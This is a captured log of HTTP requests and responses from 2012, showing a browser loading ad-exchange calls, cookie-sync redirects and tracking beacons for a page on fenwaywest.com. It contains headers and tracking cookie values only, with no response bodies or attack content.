GET /ptj?member=514&size=300x250&referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&inv_code=1651067&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D698192661%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=514&amp;size=300x250&amp;referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;inv_code=1651067&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1651067%26r%3D0%26_salt%3D698192661%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26u%3Dhttp%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjKn-qjm'; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgBIAEoATDi5aaFBRDi5aaFBRgB; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:41 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:41 GMT; domain=.adnxs.com; HttpOnly icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgCIAIoAjDl5aaFBRDl5aaFBRgC; path=/; expires=Sun, 17-Feb-2013 04:17:41 GMT; domain=.adnxs.com; HttpOnly acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Tue, 20-Nov-2012 04:17:41 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjMD7)=Bn$9U.B!+^@bhR!vJ; path=/; expires=Sun, 17-Feb-2013 04:17:41 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 416
GET /sync?type=gif&key=turn&uid=4608069794370173199 HTTP/1.1

Host: sync.adap.tv
GET /sync?type=gif&amp;key=turn&amp;uid=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: adaptv/1.0
Connection: Keep-Alive
Set-Cookie: rtbData0=&quot;key=turn:value=4608069794370173199:expiresAt=Sun+Nov+25+20%3A17%3A41+PST+2012:32-Compatible=true&quot;;Path=/;Domain=.adap.tv;Expires=Wed, 19-Nov-2014 04:17:41 GMT
Content-Length: 42
GET /imp?anmember=514&anprice=40&Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1&SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&o=3&f=05 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1&amp;SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&amp;o=3&amp;f=05 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0495.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; path=/; expires=Wed, 19-Dec-2012 04:17:41 GMT RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 19 Nov 2012 04:17:41 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4608069794370173199&cc=1 HTTP/1.1

Host: r.openx.net
GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&amp;rtb=4608069794370173199&amp;cc=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: i=a225a48e-a153-423d-a356-3d4eb5da3116
HTTP/1.1 303 See Other

HTTP/1.1 303 See Other
Cache-Control: no-cache
Content-Length: 0
Location: https://ssl-i.cdn.openx.com/1x1.gif
GET /imp?anmember=514&anprice=80&Z=300x250&s=1651067&r=0&_salt=698192661&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=80&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0433.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=15s0sijch/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=80&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:42 GMT
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1

Host: pcm1.map.pulsemgr.com
GET /uds/pc?ptnr=21272&amp;sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: Apache-Coyote/1.1
Content-Length: 43
Connection: keep-alive
GET /creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html HTTP/1.1

Host: akamai-media.contextweb.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: text/html
Last-Modified: Tue, 25 Sep 2012 16:55:42 GMT
Accept-Ranges: bytes
Etag: &quot;0bbf3983e9bcd1:0&quot;
Server: Microsoft-IIS/7.5
CW-Server: lga-app1301
ntCoent-Length: 140
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Content-Encoding: gzip
Content-Length: 139
Vary: Accept-Encoding
Cache-Control: private, max-age=854
Date: Mon, 19 Nov 2012 04:17:42 GMT
Connection: keep-alive
GET /iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1488817%26anmember%3D514%26anprice%3D40%26r%3D0%26s%3D653070,0fabe2ec-3200-11e2-9d8b-3c4a92f73a52,1353298661884 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0835.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 19 Nov 2012 04:17:42 GMT
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.usertrust.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache
Last-Modified: Sun, 18 Nov 2012 10:44:43 GMT
Expires: Thu, 22 Nov 2012 10:44:43 GMT
Etag: 8845589FBF8B30FA396E9C7CBAA2EF8B0227D927
Cache-Control: max-age=281820,public,no-transform,must-revalidate
X-OCSP-Reponder-ID: h6edcaocsp2
Content-Length: 471
Connection: close
GET /wrapper/aceUAC.js HTTP/1.1

Host: uac.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1488817%26anmember%3D514%26anprice%3D40%26r%3D0%26s%3D653070,0fabe2ec-3200-11e2-9d8b-3c4a92f73a52,1353298661884
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cteonnt-Length: 18946
Cache-Control: max-age=3600
Expires: Mon, 19 Nov 2012 04:55:41 GMT
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;
Content-Encoding: gzip
Content-Length: 6031
Vary: Accept-Encoding
Date: Mon, 19 Nov 2012 04:17:42 GMT
Connection: keep-alive
GET /GetWidget.aspx?id=924de7ea-1917-4b16-af38-f7a0a4352145&d=ZmVud2F5d2VzdC5jb20=&wid=1868&title=http%253A//www.fenwaywest.com/index.php%253Foption%253Dcom_content%2526amp%253Bview%253Darticle%2526amp%253Bid%253D7%2526amp%253BItemid%253D101&url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: api.content.ad
GET /GetWidget.aspx?id=924de7ea-1917-4b16-af38-f7a0a4352145&amp;d=ZmVud2F5d2VzdC5jb20=&amp;wid=1868&amp;title=http%253A//www.fenwaywest.com/index.php%253Foption%253Dcom_content%2526amp%253Bview%253Darticle%2526amp%253Bid%253D7%2526amp%253BItemid%253D101&amp;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wjzyzr31rdtsq4rrlm3pacbw; path=/; HttpOnly urlHistory=388817:1,387812:1,12084:1,106115:1; expires=Tue, 20-Nov-2012 16:16:18 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:16:18 GMT
Content-Length: 13688
GET /delivery/fp?u=bloguin&z=95029&n=1 HTTP/1.1

Host: www.lijit.com
GET /delivery/fp?u=bloguin&amp;z=95029&amp;n=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: text/javascript
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: PWS/8.0.9.6
X-Px: ms h0-s14.p1-arn ( h0-s29.p1-arn), ht-d h0-s29.p1-arn.cdngp.net
Cache-Control: max-age=7200
Expires: Mon, 19 Nov 2012 05:39:16 GMT
Age: 2306
Content-Length: 6878
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
GET /p?c1=8&c2=3005693&c3=13&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=884857656 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=3005693&amp;c3=13&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=884857656 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:42 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /www/delivery/lg.php?bannerid=1550&campaignid=232&cids=232&bids=1550&zoneid=95032&tid=95032_1353298658273e3751f284eda&channel_ids=,&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&cb=d93a230863 HTTP/1.1

Host: vap3iad3.lijit.com
GET /www/delivery/lg.php?bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550&amp;zoneid=95032&amp;tid=95032_1353298658273e3751f284eda&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=d93a230863 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; expires=Tue, 19-Nov-2013 04:17:42 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
GET /beacon?viewId=1353298658700ebc440fd1c19&rand=1353298658700&uri=http://www.lijit.com/users/bloguin/1&informer=6280786&type=fpads&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&ifr=1&v=1.0&rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: gslbeacon.lijit.com
GET /beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: ljt_reader=193e6b4996885915ffee71e118a270a4; ljtrtb=eJyrVjJUslIyMTOwMDCzNLc0MTY3MDQ3NrS0VKoFAFBkBdk%3D
HTTP/1.0 200 OK

Content-Type: text/html
Server: Lijit Blackbird 0.0.2
Connection: close
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 1008
Set-Cookie: tpro=eJxNkNGOhCAMRf%2Blz2SCIo7jb8y%2BbTaEYFUSAQO6ycb471swM5m303LvbekByW6YoP8%2BCkEPzzXELQEDvUFfCSnqR9e29fnDIGwzRugPcGFQJuw%2BKxi4zTr81DL4xZhs8BQHJ4OII8Zo%2FfREHc38hdHlkZS4xjDaBXOm9Sa4QhXnal12kvBbfWfQckWtUnUMBFctfz1xJQpXHY3RU7ELqZpHbgoG8iNJkldVdWZOXFFxL17iTommWCjGhGXBK2qKelDJzEUmP574rWHgg79QZtdslyGiz7Y%2FLBObOmsyybzehH64zjei00uxUuYb86G0KXON3k3ude%2Bb086052zTWril3yar%2FeszeoxKu1J153n%2BAwBvhTk%3D%00%00;Expires=Tue, 19-Nov-13 04:17:42 GMT;Domain=localhost tpro_inst=6f523e5e71b36256c91fd33e25f9231;Expires=Tue, 19-Nov-13 04:17:42 GMT;Domain=localhost
